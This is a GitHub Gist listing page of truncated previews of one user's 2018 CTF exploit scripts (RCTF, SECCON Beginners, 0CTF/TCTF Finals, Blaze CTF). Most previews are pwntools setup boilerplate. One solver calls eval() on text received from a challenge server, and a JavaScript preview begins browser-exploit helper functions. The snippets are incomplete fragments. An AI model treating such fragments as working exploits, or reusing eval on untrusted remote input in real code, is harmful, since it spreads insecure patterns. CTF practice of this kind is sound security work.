Skip to content

Instantly share code, notes, and snippets.

# RCTF2018 cpushop crypto
from pwn import *
import commands
import hashpumpy
conn = remote('cpushop.2018.teamrois.cn', 43000)
conn.sendline('2')
conn.sendline('9')
conn.recvuntil('Your order:\n')
#!/usr/bin/env python
# RCTF 2018 babyehap pwn
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('./libc.so.6')
elf = ELF('./babyheap')
context(os='linux', arch=elf.arch)
#!/usr/bin/env python
# RCTF 2018 RNote4
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./RNote4')
context(os='linux', arch=elf.arch)
#!/usr/bin/env python
# RCTF 2018 stringer pwn
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./stringer')
context(os='linux', arch=elf.arch)
@hama7230
hama7230 / exploit.py
Created May 27, 2018 04:04
SECCON BeginnersCTF 2018 BBS
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@hama7230
hama7230 / exploit.py
Created May 27, 2018 04:05
SECCON BeginnersCTF 2018 Seczon
#!/usr/bin/env python
from pwn import *
from libformatstr import FormatStr
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
libc = ELF('./libc-2.23.so')
elf = ELF('./seczon')
context(os='linux', arch=elf.arch)
@hama7230
hama7230 / solve.py
Created May 27, 2018 04:06
SECCON BeginnersCTF 2018 てけいさん
from pwn import *
conn = remote('tekeisan-ekusutoriim.chall.beginners.seccon.jp', 8690)
conn.recvuntil(' see you.')
for i in range(1, 101):
conn.recvuntil('(Stage.%d)\n'%i)
buf = conn.recvuntil('=')[:-1].strip()
conn.sendline(str(eval(buf)))
conn.interactive()
@hama7230
hama7230 / exploit.py
Created June 1, 2018 17:44
0CTF/TCTF 2018 Finals freenote2018 pwn
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('./libc-2.23.so')
elf = ELF('./freenote2018')
context(os='linux', arch=elf.arch)
# context(log_level='debug') # output verbose log
@hama7230
hama7230 / exploit.py
Created June 1, 2018 17:51
0CTF/TCTF 2018 Finals Baby Heap 18.04 pwn
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./babyheap1804')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@hama7230
hama7230 / exploit.js
Created June 8, 2018 15:01
Blaze CTF 2018 blazefox pwn (Note: only js shell)
// https://pastebin.com/gtJA92j8
function ua2d(x) {
// x: Uint32Array[2]
return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0];
}
function u2d(x) {
return ua2d([x/0x100000000, x%0x100000000]);
}
var gomi = new Uint8Array([1,2,3,4]);